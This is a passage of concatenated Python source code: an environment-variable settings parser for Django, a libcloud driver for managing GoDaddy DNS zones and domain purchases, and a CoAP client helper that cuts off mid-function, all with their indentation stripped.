DEFAULT_CACHE_ENV = 'CACHE_URL'
CACHE_SCHEMES = {
'dbcache': 'django.core.cache.backends.db.DatabaseCache',
'dummycache': 'django.core.cache.backends.dummy.DummyCache',
'filecache': 'django.core.cache.backends.filebased.FileBasedCache',
'locmemcache': 'django.core.cache.backends.locmem.LocMemCache',
'memcache': 'django.core.cache.backends.memcached.MemcachedCache',
'pymemcache': 'django.core.cache.backends.memcached.PyLibMCCache',
'rediscache': 'redis_cache.cache.RedisCache',
'redis': 'redis_cache.cache.RedisCache',
}
_CACHE_BASE_OPTIONS = ['TIMEOUT', 'KEY_PREFIX', 'VERSION', 'KEY_FUNCTION']
DEFAULT_EMAIL_ENV = 'EMAIL_URL'
EMAIL_SCHEMES = {
'smtp': 'django.core.mail.backends.smtp.EmailBackend',
'smtps': 'django.core.mail.backends.smtp.EmailBackend',
'consolemail': 'django.core.mail.backends.console.EmailBackend',
'filemail': 'django.core.mail.backends.filebased.EmailBackend',
'memorymail': 'django.core.mail.backends.locmem.EmailBackend',
'dummymail': 'django.core.mail.backends.dummy.EmailBackend'
}
_EMAIL_BASE_OPTIONS = ['EMAIL_USE_TLS', ]
DEFAULT_SEARCH_ENV = 'SEARCH_URL'
SEARCH_SCHEMES = {
"elasticsearch": "haystack.backends.elasticsearch_backend.ElasticsearchSearchEngine",
"solr": "haystack.backends.solr_backend.SolrEngine",
"whoosh": "haystack.backends.whoosh_backend.WhooshEngine",
"simple": "haystack.backends.simple_backend.SimpleEngine",
}
def __init__(self, **schema):
self.schema = schema
def __call__(self, var, cast=None, default=NOTSET, parse_default=False):
return self.get_value(var, cast=cast, default=default, parse_default=parse_default)
# Shortcuts
def str(self, var, default=NOTSET):
"""
:rtype: str
"""
return self.get_value(var, default=default)
def unicode(self, var, default=NOTSET):
"""Helper for python2
:rtype: unicode
"""
return self.get_value(var, cast=text_type, default=default)
def bool(self, var, default=NOTSET):
"""
:rtype: bool
"""
return self.get_value(var, cast=bool, default=default)
def int(self, var, default=NOTSET):
"""
:rtype: int
"""
return self.get_value(var, cast=int, default=default)
def float(self, var, default=NOTSET):
"""
:rtype: float
"""
return self.get_value(var, cast=float, default=default)
def json(self, var, default=NOTSET):
"""
:returns: Json parsed
"""
return self.get_value(var, cast=json.loads, default=default)
def list(self, var, cast=None, default=NOTSET):
"""
:rtype: list
"""
return self.get_value(var, cast=list if not cast else [cast], default=default)
def dict(self, var, cast=dict, default=NOTSET):
"""
:rtype: dict
"""
return self.get_value(var, cast=cast, default=default)
def url(self, var, default=NOTSET):
"""
:rtype: urlparse.ParseResult
"""
return self.get_value(var, cast=urlparse.urlparse, default=default, parse_default=True)
def db_url(self, var=DEFAULT_DATABASE_ENV, default=NOTSET, engine=None):
"""Returns a config dictionary, defaulting to DATABASE_URL.
:rtype: dict
"""
return self.db_url_config(self.get_value(var, default=default), engine=engine)
db = db_url
def cache_url(self, var=DEFAULT_CACHE_ENV, default=NOTSET, backend=None):
"""Returns a config dictionary, defaulting to CACHE_URL.
:rtype: dict
"""
return self.cache_url_config(self.url(var, default=default), backend=backend)
cache = cache_url
def email_url(self, var=DEFAULT_EMAIL_ENV, default=NOTSET, backend=None):
"""Returns a config dictionary, defaulting to EMAIL_URL.
:rtype: dict
"""
return self.email_url_config(self.url(var, default=default), backend=backend)
email = email_url
def search_url(self, var=DEFAULT_SEARCH_ENV, default=NOTSET, engine=None):
"""Returns a config dictionary, defaulting to SEARCH_URL.
:rtype: dict
"""
return self.search_url_config(self.url(var, default=default), engine=engine)
def path(self, var, default=NOTSET, **kwargs):
"""
:rtype: Path
"""
return Path(self.get_value(var, default=default), **kwargs)
def get_value(self, var, cast=None, default=NOTSET, parse_default=False):
"""Return value for given environment variable.
:param var: Name of variable.
:param cast: Type to cast return value as.
:param default: If var not present in environ, return this instead.
:param parse_default: force parsing of the default value.
:returns: Value from environment or default (if set)
"""
logger.debug("get '{0}' casted as '{1}' with default '{2}'".format(var, cast, default))
if var in self.schema:
var_info = self.schema[var]
try:
has_default = len(var_info) == 2
except TypeError:
has_default = False
if has_default:
if not cast:
cast = var_info[0]
if default is self.NOTSET:
try:
default = var_info[1]
except IndexError:
pass
else:
if not cast:
cast = var_info
try:
value = os.environ[var]
except KeyError:
if default is self.NOTSET:
error_msg = "Set the {0} environment variable".format(var)
raise ImproperlyConfigured(error_msg)
value = default
# Resolve any proxied values
if hasattr(value, 'startswith') and value.startswith('$'):
value = value.lstrip('$')
value = self.get_value(value, cast=cast, default=default)
if value != default or parse_default:
value = self.parse_value(value, cast)
return value
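# Illustrative use of the '$' proxy resolution above (names are made up):
#   os.environ['BASE_URL'] = 'http://example.com'
#   os.environ['API_URL'] = '$BASE_URL'
#   Env().str('API_URL')  # -> 'http://example.com', looked up indirectly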
# Class and static methods
@classmethod
def parse_value(cls, value, cast):
"""Parse and cast provided value
:param value: Stringed value.
:param cast: Type to cast return value as.
:returns: Casted value
"""
if cast is None:
return value
elif cast is bool:
try:
value = int(value) != 0
except ValueError:
value = value.lower() in cls.BOOLEAN_TRUE_STRINGS
elif isinstance(cast, list):
value = list(map(cast[0], [x for x in value.split(',') if x]))
elif isinstance(cast, dict):
key_cast = cast.get('key', str)
value_cast = cast.get('value', text_type)
value_cast_by_key = cast.get('cast', dict())
value = dict(map(
lambda kv: (key_cast(kv[0]), cls.parse_value(kv[1], value_cast_by_key.get(kv[0], value_cast))),
[val.split('=') for val in value.split(';') if val]
))
elif cast is dict:
#elif hasattr(cast, '__name__') and cast.__name__ == 'dict':
value = dict([val.split('=') for val in value.split(',') if val])
elif cast is list:
value = [x for x in value.split(',') if x]
elif cast is float:
# clean string
float_str = re.sub(r'[^\d,\.]', '', value)
# split for avoid thousand separator and different locale comma/dot symbol
parts = re.split(r'[,\.]', float_str)
if len(parts) == 1:
float_str = parts[0]
else:
float_str = "{0}.{1}".format(''.join(parts[0:-1]), parts[-1])
value = float(float_str)
else:
value = cast(value)
return value
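# A few illustrative casts (input values chosen for this sketch):
#   Env.parse_value('1', bool)                  # -> True
#   Env.parse_value('a,b,c', list)              # -> ['a', 'b', 'c']
#   Env.parse_value('x=1;y=2', {'value': int})  # -> {'x': 1, 'y': 2}
#   Env.parse_value('1,000.5', float)           # -> 1000.5 (separators cleaned)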
@classmethod
def db_url_config(cls, url, engine=None):
"""Pulled from DJ-Database-URL, parse an arbitrary Database URL.
Support currently exists for PostgreSQL, PostGIS, MySQL and SQLite.
SQLite connects to file based databases. The same URL format is used, omitting the hostname,
and using the "file" portion as the filename of the database.
This has the effect of four slashes being present for an absolute file path:
>>> from environ import Env
>>> Env.db_url_config('sqlite:////full/path/to/your/file.sqlite')
{'ENGINE': 'django.db.backends.sqlite3', 'HOST': None, 'NAME': '/full/path/to/your/file.sqlite', 'PASSWORD': None, 'PORT': None, 'USER': None}
>>> Env.db_url_config('postgres://uf07k1i6d8ia0v:wegauwhgeuioweg@ec2-107-21-253-135.compute-1.amazonaws.com:5431/d8r82722r2kuvn')
{'ENGINE': 'django.db.backends.postgresql_psycopg2', 'HOST': 'ec2-107-21-253-135.compute-1.amazonaws.com', 'NAME': 'd8r82722r2kuvn', 'PASSWORD': 'wegauwhgeuioweg', 'PORT': 5431, 'USER': 'uf07k1i6d8ia0v'}
"""
if not isinstance(url, cls.URL_CLASS):
if url == 'sqlite://:memory:':
# this is a special case, because if we pass this URL into
# urlparse, urlparse will choke trying to interpret "memory"
# as a port number
return {
'ENGINE': cls.DB_SCHEMES['sqlite'],
'NAME': ':memory:'
}
# note: no other settings are required for sqlite
url = urlparse.urlparse(url)
config = {}
# Remove query strings.
path = url.path[1:]
path = path.split('?', 2)[0]
# if we are using sqlite and we have no path, then assume we
# want an in-memory database (this is the behaviour of sqlalchemy)
if url.scheme == 'sqlite' and path == '':
path = ':memory:'
if url.scheme == 'ldap':
path = '{scheme}://{hostname}'.format(scheme=_cast_str(url.scheme), hostname=_cast_str(url.hostname))
if url.port:
path += ':{port}'.format(port=_cast_str(url.port))
# Update with environment configuration.
config.update({
'NAME': path,
'USER': _cast_str(url.username),
'PASSWORD': _cast_str(url.password),
'HOST': _cast_str(url.hostname),
'PORT': _cast_int(url.port),
})
if url.query:
config_options = {}
for k, v in urlparse.parse_qs(url.query).items():
if k.upper() in cls._DB_BASE_OPTIONS:
config.update({k.upper(): _cast_int(v[0])})
else:
config_options.update({k: _cast_int(v[0])})
config['OPTIONS'] = config_options
if engine:
config['ENGINE'] = engine
if url.scheme in Env.DB_SCHEMES:
config['ENGINE'] = Env.DB_SCHEMES[url.scheme]
if not config.get('ENGINE', False):
warnings.warn("Engine not recognized from url: {0}".format(config))
return {}
return config
@classmethod
def cache_url_config(cls, url, backend=None):
"""Pulled from DJ-Cache-URL, parse an arbitrary Cache URL.
:param url:
:param overrides:
:return:
"""
url = urlparse.urlparse(url) if not isinstance(url, cls.URL_CLASS) else url
location = url.netloc.split(',')
if len(location) == 1:
location = location[0]
config = {
'BACKEND': cls.CACHE_SCHEMES[url.scheme],
'LOCATION': location,
}
if url.scheme == 'filecache':
config.update({
'LOCATION': _cast_str(url.netloc + url.path),
})
if url.path and url.scheme in ['memcache', 'pymemcache', 'rediscache']:
config.update({
'LOCATION': 'unix:' + url.path,
})
if url.query:
config_options = {}
for k, v in urlparse.parse_qs(url.query).items():
opt = {k.upper(): _cast_int(v[0])}
if k.upper() in cls._CACHE_BASE_OPTIONS:
config.update(opt)
else:
config_options.update(opt)
config['OPTIONS'] = config_options
if backend:
config['BACKEND'] = backend
return config
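# Illustrative parse (scheme taken from CACHE_SCHEMES above):
#   Env.cache_url_config('locmemcache://')
#   # -> {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
#   #     'LOCATION': ''}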
@classmethod
def email_url_config(cls, url, backend=None):
"""Parses an email URL."""
config = {}
url = urlparse.urlparse(url) if not isinstance(url, cls.URL_CLASS) else url
# Remove query strings
path = url.path[1:]
path = path.split('?', 2)[0]
# Update with environment configuration
config.update({
'EMAIL_FILE_PATH': path,
'EMAIL_HOST_USER': _cast_str(url.username),
'EMAIL_HOST_PASSWORD': _cast_str(url.password),
'EMAIL_HOST': _cast_str(url.hostname),
'EMAIL_PORT': _cast_int(url.port),
})
if backend:
config['EMAIL_BACKEND'] = backend
elif url.scheme in cls.EMAIL_SCHEMES:
config['EMAIL_BACKEND'] = cls.EMAIL_SCHEMES[url.scheme]
if url.scheme == 'smtps':
config['EMAIL_USE_TLS'] = True
else:
config['EMAIL_USE_TLS'] = False
if url.query:
config_options = {}
for k, v in urlparse.parse_qs(url.query).items():
opt = {k.upper(): _cast_int(v[0])}
if k.upper() in cls._EMAIL_BASE_OPTIONS:
config.update(opt)
else:
config_options.update(opt)
config['OPTIONS'] = config_options
return config
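# Illustrative parse (credentials are placeholders):
#   Env.email_url_config('smtps://user:pass@localhost:587')
#   # -> EMAIL_BACKEND '...smtp.EmailBackend', EMAIL_HOST 'localhost',
#   #    EMAIL_PORT 587, EMAIL_USE_TLS True (the 'smtps' scheme implies TLS)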
@classmethod
def search_url_config(cls, url, engine=None):
config = {}
url = urlparse.urlparse(url) if not isinstance(url, cls.URL_CLASS) else url
# Remove query strings.
path = url.path[1:]
path = path.split('?', 2)[0]
if url.scheme in cls.SEARCH_SCHEMES:
config["ENGINE"] = cls.SEARCH_SCHEMES[url.scheme]
if path.endswith("/"):
path = path[:-1]
split = path.rsplit("/", 1)
if len(split) > 1:
path = split[0]
index = split[-1]
else:
path = ""
index = split[0]
config.update({
"URL": urlparse.urlunparse(("http",) + url[1:2] + (path,) + url[3:]),
"INDEX_NAME": index,
})
if path:
config.update({
"PATH": path,
})
if engine:
config['ENGINE'] = engine
return config
@staticmethod
def read_env(env_file=None, **overrides):
"""Read a .env file into os.environ.
If not given a path to a dotenv file, does filthy magic stack backtracking
to locate the calling file and looks for a .env next to it.
http://www.wellfireinteractive.com/blog/easier-12-factor-django/
https://gist.github.com/bennylope/2999704
"""
if env_file is None:
frame = sys._getframe()
env_file = os.path.join(os.path.dirname(frame.f_back.f_code.co_filename), '.env')
if not os.path.exists(env_file):
warnings.warn("not reading %s - it doesn't exist." % env_file)
return
try:
with open(env_file) if isinstance(env_file, basestring) else env_file as f:
content = f.read()
except IOError:
warnings.warn("not reading %s - it doesn't exist." % env_file)
return
logger.debug('Read environment variables from: {0}'.format(env_file))
for line in content.splitlines():
m1 = re.match(r'\A([A-Za-z_0-9]+)=(.*)\Z', line)
if m1:
key, val = m1.group(1), m1.group(2)
m2 = re.match(r"\A'(.*)'\Z", val)
if m2:
val = m2.group(1)
m3 = re.match(r'\A"(.*)"\Z', val)
if m3:
val = re.sub(r'\\(.)', r'\1', m3.group(1))
os.environ.setdefault(key, text_type(val))
# set defaults
for key, value in overrides.items():
os.environ.setdefault(key, value)
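# Typical settings.py usage, as a sketch (variable names are examples):
#   Env.read_env()                     # loads the .env next to the caller
#   env = Env(DEBUG=(bool, False))
#   DEBUG = env('DEBUG')
#   DATABASES = {'default': env.db()}  # parses DATABASE_URL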
class Path(object):
"""Inspired to Django Two-scoops, handling File Paths in Settings.
>>> from environ import Path
>>> root = Path('/home')
>>> root, root(), root('dev')
(<Path:/home>, '/home', '/home/dev')
>>> root == Path('/home')
True
>>> root in Path('/'), root not in Path('/other/path')
(True, True)
>>> root('dev', 'not_existing_dir', required=True)
Traceback (most recent call last):
environ.environ.ImproperlyConfigured: Create required path: /home/not_existing_dir
>>> public = root.path('public')
>>> public, public.root, public('styles')
(<Path:/home/public>, '/home/public', '/home/public/styles')
>>> assets, scripts = public.path('assets'), public.path('assets', 'scripts')
>>> assets.root, scripts.root
('/home/public/assets', '/home/public/assets/scripts')
>>> assets + 'styles', str(assets + 'styles'), ~assets
(<Path:/home/public/assets/styles>, '/home/public/assets/styles', <Path:/home/public>)
"""
def path(self, *paths, **kwargs):
"""Create new Path based on self.root and provided paths.
:param paths: List of sub paths
:param kwargs: required=False
:rtype: Path
"""
return self.__class__(self.__root__, *paths, **kwargs)
def file(self, name, *args, **kwargs):
"""Open a file.
:param name: Filename appended to self.root
:param args: passed to open()
:param kwargs: passed to open()
:rtype: file
"""
return open(self(name), *args, **kwargs)
@property
def root(self):
"""Current directory for this Path"""
return self.__root__
def __init__(self, start='', *paths, **kwargs):
super(Path, self).__init__()
if kwargs.get('is_file', False):
start = os.path.dirname(start)
self.__root__ = self._absolute_join(start, *paths, **kwargs)
def __call__(self, *paths, **kwargs):
"""Retrieve the absolute path, with appended paths
:param paths: List of sub path of self.root
:param kwargs: required=False
"""
return self._absolute_join(self.__root__, *paths, **kwargs)
def __eq__(self, other):
return self.__root__ == other.__root__
def __ne__(self, other):
return not self.__eq__(other)
def __add__(self, other):
return Path(self.__root__, other if not isinstance(other, Path) else other.__root__)
def __sub__(self, other):
if isinstance(other, int):
return self.path('../' * other)
elif isinstance(other, (str, text_type)):
return Path(self.__root__.rstrip(other))
raise TypeError("unsupported operand type(s) for -: '{0}' and '{1}'".format(self, type(other)))
def __invert__(self):
return self.path('..')
def __contains__(self, item):
base_path = self.__root__
if len(base_path) > 1:
base_path = os.path.join(base_path, '')
return item.__root__.startswith(base_path)
def __repr__(self):
return "<Path:{0}>".format(self.__root__)
def __str__(self):
return self.__root__
def __unicode__(self):
return self.__str__()
@staticmethod
def _absolute_join(base, *paths, **kwargs):
absolute_path = os.path.abspath(os.path.join(base, *paths))
if kwargs.get('required', False) and not os.path.exists(absolute_path):
raise ImproperlyConfigured("Create required path: {0}".format(absolute_path))
return absolute_path
def register_scheme(scheme):
for method in filter(lambda s: s.startswith('uses_'), dir(urlparse)):
getattr(urlparse, method).append(scheme)
# Register database and cache schemes in URLs.
for schema in list(Env.DB_SCHEMES.keys()) + list(Env.CACHE_SCHEMES.keys()) + list(Env.SEARCH_SCHEMES.keys()) + list(Env.EMAIL_SCHEMES.keys()):
register_scheme(schema)
|
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'GoDaddyDNSDriver'
]
try:
import simplejson as json
except ImportError:
import json
from libcloud.common.base import ConnectionKey, JsonResponse
from libcloud.common.types import LibcloudError
from libcloud.utils.py3 import httplib
from libcloud.dns.types import Provider, RecordType, RecordDoesNotExistError
from libcloud.dns.base import DNSDriver, Zone, Record
API_ROOT = 'https://api.godaddy.com/'
VALID_RECORD_EXTRA_PARAMS = ['prio', 'ttl']
class GoDaddyDNSException(LibcloudError):
def __init__(self, code, message):
self.code = code
self.message = message
self.args = (code, message)
def __str__(self):
return self.__repr__()
def __repr__(self):
return '<GoDaddyDNSException in %d: %s>' % (self.code, self.message)
class GoDaddyDNSResponse(JsonResponse):
valid_response_codes = [httplib.OK, httplib.ACCEPTED, httplib.CREATED,
httplib.NO_CONTENT]
def parse_body(self):
if not self.body:
return None
# json.loads doesn't like the regex expressions used in godaddy schema
self.body = self.body.replace('\\.', '\\\\.')
data = json.loads(self.body)
return data
def parse_error(self):
data = self.parse_body()
raise GoDaddyDNSException(
data['code'], data['message'])
def success(self):
return self.status in self.valid_response_codes
class GoDaddyDNSConnection(ConnectionKey):
responseCls = GoDaddyDNSResponse
host = API_ROOT
allow_insecure = False
def __init__(self, key, secret, shopper_id, secure=True, host=None,
port=None, url=None, timeout=None,
proxy_url=None, backoff=None, retry_delay=None):
super(GoDaddyDNSConnection, self).__init__(
key,
secure=secure, host=host,
port=port, url=url,
timeout=timeout,
proxy_url=proxy_url,
backoff=backoff,
retry_delay=retry_delay)
self.key = key
self.secret = secret
self.shopper_id = shopper_id
def add_default_headers(self, headers):
headers['X-Shopper-Id'] = self.shopper_id
headers['Authorization'] = "sso-key %s:%s" % \
(self.key, self.secret)
return headers
class GoDaddyDNSDriver(DNSDriver):
"""
A driver for GoDaddy DNS.
This driver is for GoDaddy customers who wish to purchase domains,
update existing domains, and manage records for DNS zones
hosted on GoDaddy nameservers.
"""
type = Provider.GODADDY
name = 'GoDaddy DNS'
website = 'https://www.godaddy.com/'
connectionCls = GoDaddyDNSConnection
RECORD_TYPE_MAP = {
RecordType.A: 'A',
RecordType.AAAA: 'AAAA',
RecordType.CNAME: 'CNAME',
RecordType.MX: 'MX',
RecordType.NS: 'NS',
RecordType.SRV: 'SRV',
RecordType.TXT: 'TXT',
}
def __init__(self, shopper_id, key, secret,
secure=True, host=None, port=None):
"""
Instantiate a new `GoDaddyDNSDriver`
:param shopper_id: Your customer ID or shopper ID with GoDaddy
:type shopper_id: ``str``
:param key: Your access key from developer.godaddy.com
:type key: ``str``
:param secret: Your access key secret
:type secret: ``str``
"""
super(GoDaddyDNSDriver, self).__init__(key=key, secret=secret,
secure=secure,
host=host, port=port,
shopper_id=str(shopper_id))
def list_zones(self):
"""
Return a list of zones (purchased domains)
:return: ``list`` of :class:`Zone`
"""
result = self.connection.request(
'/v1/domains/').object
zones = self._to_zones(result)
return zones
def list_records(self, zone):
"""
Return a list of records for the provided zone.
:param zone: Zone to list records for.
:type zone: :class:`Zone`
:return: ``list`` of :class:`Record`
"""
result = self.connection.request(
'/v1/domains/%s/records' % (zone.domain)).object
records = self._to_records(items=result, zone=zone)
return records
def create_record(self, name, zone, type, data, extra=None):
"""
Create a new record.
:param name: Record name without the domain name (e.g. www).
Note: If you want to create a record for a base domain
name, you should specify empty string ('') for this
argument.
:type name: ``str``
:param zone: Zone where the requested record is created.
:type zone: :class:`Zone`
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: Extra attributes (driver specific). (optional)
:type extra: ``dict``
:rtype: :class:`Record`
"""
new_record = self._format_record(name, type, data, extra)
self.connection.request(
'/v1/domains/%s/records' % (zone.domain), method='PATCH',
data=[new_record])
id = self._get_id_of_record(name, type)
return Record(
id=id, name=name,
type=type, data=data,
zone=zone, driver=self,
ttl=new_record['ttl'],
extra=extra)
def update_record(self, record, name, type, data, extra=None):
"""
Update an existing record.
:param record: Record to update.
:type record: :class:`Record`
:param name: Record name without the domain name (e.g. www).
Note: If you want to create a record for a base domain
name, you should specify empty string ('') for this
argument.
:type name: ``str``
:param type: DNS record type (A, AAAA, ...).
:type type: :class:`RecordType`
:param data: Data for the record (depends on the record type).
:type data: ``str``
:param extra: (optional) Extra attributes (driver specific).
:type extra: ``dict``
:rtype: :class:`Record`
"""
new_record = self._format_record(name, type, data, extra)
self.connection.request(
'/v1/domains/%s/records/%s/%s' % (record.zone.domain,
record.type,
record.name),
method='PUT',
data=[new_record])
id = self._get_id_of_record(name, type)
return Record(
id=id, name=name,
type=type, data=data,
zone=record.zone, driver=self,
ttl=new_record['ttl'],
extra=extra)
def get_record(self, zone_id, record_id):
"""
Return a Record instance.
:param zone_id: ID of the required zone
:type zone_id: ``str``
:param record_id: ID of the required record
:type record_id: ``str``
:rtype: :class:`Record`
"""
parts = record_id.split(':')
result = self.connection.request(
'/v1/domains/%s/records/%s/%s' % (
zone_id,
parts[1],
parts[0])).object
if len(result) == 0:
raise RecordDoesNotExistError(record_id,
driver=self,
record_id=record_id)
return self._to_record(result[0],
self.get_zone(zone_id))
def get_zone(self, zone_id):
"""
Get a zone (by domain)
:param zone_id: The domain, not the ID
:type zone_id: ``str``
:rtype: :class:`Zone`
"""
result = self.connection.request(
'/v1/domains/%s/' % zone_id).object
zone = self._to_zone(result)
return zone
def delete_zone(self, zone):
"""
Delete a zone.
Note: This will CANCEL a purchased domain
:param zone: Zone to delete.
:type zone: :class:`Zone`
:rtype: ``bool``
"""
self.connection.request(
'/v1/domains/%s' % (zone.domain),
method='DELETE')
# no error means ok
return True
def ex_check_availability(self, domain, for_transfer=False):
"""
Check the availability of the domain
:param domain: the domain name e.g. wazzlewobbleflooble.com
:type domain: ``str``
:param for_transfer: Check if domain is available for transfer
:type for_transfer: ``bool``
:rtype: `list` of :class:`GoDaddyAvailability`
"""
result = self.connection.request(
'/v1/domains/available',
method='GET',
params={
'domain': domain,
'forTransfer': str(for_transfer)
}
).object
return GoDaddyAvailability(
domain=result['domain'],
available=result['available'],
price=result['price'],
currency=result['currency'],
period=result['period']
)
def ex_list_tlds(self):
"""
List available TLDs for sale
:rtype: ``list`` of :class:`GoDaddyTLD`
"""
result = self.connection.request(
'/v1/domains/tlds',
method='GET'
).object
return self._to_tlds(result)
def ex_get_purchase_schema(self, tld):
"""
Get the schema that needs completing to purchase a new domain
Use this in conjunction with ex_purchase_domain
:param tld: The top level domain e.g com, eu, uk
:type tld: ``str``
:rtype: `dict` the JSON Schema
"""
result = self.connection.request(
'/v1/domains/purchase/schema/%s' % tld,
method='GET'
).object
return result
def ex_get_agreements(self, tld, privacy=True):
"""
Get the legal agreements for a tld
Use this in conjunction with ex_purchase_domain
:param tld: The top level domain e.g com, eu, uk
:type tld: ``str``
:rtype: `dict` the JSON Schema
"""
result = self.connection.request(
'/v1/domains/agreements',
params={
'tlds': tld,
'privacy': str(privacy)
},
method='GET'
).object
agreements = []
for item in result:
agreements.append(
GoDaddyLegalAgreement(
agreement_key=item['agreementKey'],
title=item['title'],
url=item['url'],
content=item['content']))
return agreements
def ex_purchase_domain(self, purchase_request):
"""
Purchase a domain with GoDaddy
:param purchase_request: The completed document
from ex_get_purchase_schema
:type purchase_request: ``dict``
:rtype: :class:`GoDaddyDomainPurchaseResponse` Your order
"""
result = self.connection.request(
'/v1/domains/purchase',
data=purchase_request,
method='POST'
).object
return GoDaddyDomainPurchaseResponse(
order_id=result['orderId'],
item_count=result['itemCount'],
total=result['total'],
currency=result['currency']
)
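# A sketch of the purchase workflow these ex_ methods support (the tld and
# the request contents are illustrative):
#   schema = driver.ex_get_purchase_schema('com')
#   agreements = driver.ex_get_agreements('com')
#   request = {}  # fill in the fields the schema requires
#   order = driver.ex_purchase_domain(request)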
def _format_record(self, name, type, data, extra):
if extra is None:
extra = {}
new_record = {}
if type == RecordType.SRV:
new_record = {
'type': type,
'name': name,
'data': data,
'priority': 1,
'ttl': extra.get('ttl', 5),
'service': extra.get('service', ''),
'protocol': extra.get('protocol', ''),
'port': extra.get('port', ''),
'weight': extra.get('weight', '1')
}
else:
new_record = {
'type': type,
'name': name,
'data': data,
'priority': 1,
'ttl': extra.get('ttl', 5)
}
return new_record
def _to_zones(self, items):
zones = []
for item in items:
zones.append(self._to_zone(item))
return zones
def _to_zone(self, item):
extra = {"expires": item['expires']}
zone = Zone(id=item['domainId'], domain=item['domain'],
type='master', ttl=None,
driver=self, extra=extra)
return zone
def _to_records(self, items, zone=None):
records = []
for item in items:
records.append(self._to_record(item=item, zone=zone))
return records
def _to_record(self, item, zone=None):
ttl = item['ttl']
type = self._string_to_record_type(item['type'])
name = item['name']
id = self._get_id_of_record(name, type)
record = Record(id=id, name=name,
type=type, data=item['data'],
zone=zone, driver=self,
ttl=ttl)
return record
def _to_tlds(self, items):
tlds = []
for item in items:
tlds.append(self._to_tld(item))
return tlds
def _to_tld(self, item):
return GoDaddyTLD(
name=item['name'],
tld_type=item['type']
)
def _get_id_of_record(self, name, type):
return '%s:%s' % (name, type)
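# Record ids are synthesized as "<name>:<type>" because the GoDaddy API does
# not expose record ids of its own; get_record() splits on ":" to recover
# the two halves.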
class GoDaddyAvailability(object):
def __init__(self, domain, available, price, currency, period):
self.domain = domain
self.available = bool(available)
# currency comes in micro-units, convert to dollars.
self.price = float(price) / 1000000
self.currency = currency
self.period = int(period)
class GoDaddyTLD(object):
def __init__(self, name, tld_type):
self.name = name
self.type = tld_type
class GoDaddyDomainPurchaseResponse(object):
def __init__(self, order_id, item_count, total, currency):
self.order_id = order_id
self.item_count = item_count
self.total = total
self.currency = currency
class GoDaddyLegalAgreement(object):
def __init__(self, agreement_key, title, url, content):
self.agreement_key = agreement_key
self.title = title
self.url = url
self.content = content
|
|
import random
import re
import socket
import threading
import time
from coapthon.messages.message import Message
from coapthon.messages.response import Response
from coapthon import defines
from coapthon.serializer import Serializer
from coapthon.messages.request import Request
# import logging as log
__author__ = 'giacomo'
class HelperClientSynchronous(object):
def __init__(self, parent=None):
self._currentMID = 100
self.relation = {}
self.received = {}
self.sent = {}
self.sent_token = {}
self.received_token = {}
self.call_id = {}
self._response = None
self.condition = threading.Condition()
self._endpoint = None
self._socket = None
self._receiver_thread = None
self.stop = False
self.parent = parent
@staticmethod
def start(operations):
# self.transport.connect(host, self.server[1])
function, args, kwargs = operations[0]
function(*args, **kwargs)
def send(self, request, endpoint, resend=False):
self._endpoint = endpoint
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._receiver_thread = threading.Thread(target=self.datagram_received)
self._receiver_thread.start()
if not resend:
if request.mid is None:
request.mid = self._currentMID
self._currentMID += 1
key = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(request.mid))
key_token = hash(str(self._endpoint[0]) + str(self._endpoint[1]) + str(request.token))
self.sent[key] = (request, time.time())
self.sent_token[key_token] = request
if request.type is None:
request.type = defines.inv_types["CON"]
serializer = Serializer()
request.destination = self._endpoint
# host, port = request.destination
# print "Message sent to " + host + ":" + str(port)
# print "----------------------------------------"
# print request
# print "----------------------------------------"
datagram = serializer.serialize(request)
# log.info("Send datagram")
self._socket.sendto(datagram, self._endpoint)
def schedule_retransmission(self, request):
host, port = self._endpoint
if request.type == defines.inv_types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
key = hash(str(host) + str(port) + str(request.mid))
self.call_id[key] = (threading.Timer(future_time, self.retransmit, (request, host, port, future_time)), 0)
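# CON requests are retried with exponential back-off, per RFC 7252 4.2: the
# first timeout is drawn from [ACK_TIMEOUT, ACK_TIMEOUT * ACK_RANDOM_FACTOR]
# and doubles on each retry, giving up after MAX_RETRANSMIT attempts.
# Illustrative timeline assuming the RFC defaults (ACK_TIMEOUT=2 s,
# MAX_RETRANSMIT=4): send at t=0, retries near t=2, 6, 14, 30, then fail.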
def retransmit(self, request, host, port, future_time):
# log.info("Retransmit")
# note: threading.Timer calls this as retransmit(*args), so the four
# values scheduled above arrive as separate parameters
key = hash(str(host) + str(port) + str(request.mid))
call_id, retransmit_count = self.call_id[key]
if retransmit_count < defines.MAX_RETRANSMIT and (not request.acknowledged and not request.rejected):
retransmit_count += 1
self.sent[key] = (request, time.time())
self.send(request, request.destination)
future_time *= 2
self.call_id[key] = (threading.Timer(future_time, self.retransmit,
(request, host, port, future_time)), retransmit_count)
elif request.acknowledged or request.rejected:
request.timeouted = False
del self.call_id[key]
else:
request.timeouted = True
# log.error("Request timeouted")
del self.call_id[key]
# notify timeout
self.condition.acquire()
self.condition.notify()
self.condition.release()
def datagram_received(self):
# TODO mutex
self.stop = False
while not self.stop:
self._socket.settimeout(2 * defines.ACK_TIMEOUT)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout, e:
err = e.args[0]
# this next if/else is a bit redundant, but illustrates how the
# timeout exception is setup
if err == 'timed out':
print 'recv timed out, retry later'
continue
else:
print e
return
except socket.error, e:
# Something else happened, handle error, exit, etc.
print e
return
else:
if len(datagram) == 0:
print 'orderly shutdown on server end'
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
message = serializer.deserialize(datagram, host, port)
# print "Message received from " + host + ":" + str(port)
# print "----------------------------------------"
# print message
# print "----------------------------------------"
if isinstance(message, Response):
self.handle_response(message)
elif isinstance(message, Request):
